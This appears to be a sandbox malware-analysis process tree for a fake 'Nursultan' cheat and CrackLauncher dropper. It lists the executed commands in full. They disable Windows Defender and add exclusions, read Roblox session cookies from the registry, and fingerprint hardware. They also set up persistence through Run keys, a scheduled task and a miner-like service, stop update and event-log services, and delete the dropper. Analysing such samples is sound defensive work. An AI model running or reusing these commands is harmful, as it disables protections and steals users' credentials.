    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:4300
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2876
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:3800
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
    3⤵
    PID:116
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3948
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "XMRKNZQC"
    3⤵
    - Launches sc.exe
    PID:1752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4972
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Views/modifies file attributes
    PID:2316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5076
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4440
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4016
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3832
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2616
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
    3⤵
    PID:2176
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4796
- C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4520
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Drops startup file
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3628
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2560
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4244
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:656
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2788
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3492
- C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4276
- - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
    3⤵
    - Executes dropped EXE
    PID:1840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Executes dropped EXE
    PID:1640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2172
- - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:5092
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4244
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5024
- - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
    3⤵
    - Checks computer location settings
    - Adds Run key to start application
    PID:4136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3292
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
      4⤵
      Executes dropped EXE
      PID:3848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:396
  - - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      PID:4428
    - - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4260
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        
        PID:3064
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:5092
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:3832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        
        PID:3200
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4216
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        5⤵
        
        PID:3552
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        Runs ping.exe
        
        PID:4260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:872
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4276
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:3848
  - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
      4⤵
      Checks computer location settings
      Adds Run key to start application
      PID:4600
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4124
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        5⤵
        Executes dropped EXE
        
        PID:4328
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1980
    - - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        5⤵
        Executes dropped EXE
        
        PID:3132
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        5⤵
        
        PID:2848
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4276
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:3112
    - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        5⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:3460
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        6⤵
        
        PID:4336
      - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        6⤵
        Executes dropped EXE
        
        PID:3044
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4964
      - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3012
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        7⤵
        
        PID:1980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        
        PID:2952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        
        PID:4820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        
        PID:3044
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:4980
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:4692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        
        PID:936
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:2440
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        7⤵
        
        PID:852
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        Runs ping.exe
        
        PID:3488
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        6⤵
        
        PID:3096
      - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3832
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:2788
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5008
      - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        6⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        7⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5092
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:2144
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        
        PID:3520
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        8⤵
        
        PID:2908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:1284
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:3292
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:4896
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        8⤵
        
        PID:3420
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        8⤵
        Launches sc.exe
        
        PID:964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:4216
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        8⤵
        Power Settings
        
        PID:3660
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        8⤵
        Power Settings
        
        PID:3340
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        8⤵
        Power Settings
        
        PID:4944
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:4988
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:2076
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        8⤵
        Launches sc.exe
        
        PID:2384
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        8⤵
        Launches sc.exe
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        7⤵
        Executes dropped EXE
        
        PID:1840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        7⤵
        
        PID:872
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        7⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4896
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:2172
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        7⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3920
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        8⤵
        Executes dropped EXE
        
        PID:1840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4600
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        9⤵
        Views/modifies file attributes
        
        PID:2172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        9⤵
        
        PID:3988
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        9⤵
        
        PID:1980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        
        PID:3752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        
        PID:1644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:2848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        9⤵
        
        PID:4804
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        9⤵
        
        PID:1984
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        
        PID:1184
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:700
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        9⤵
        
        PID:2440
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        10⤵
        Runs ping.exe
        
        PID:1880
        
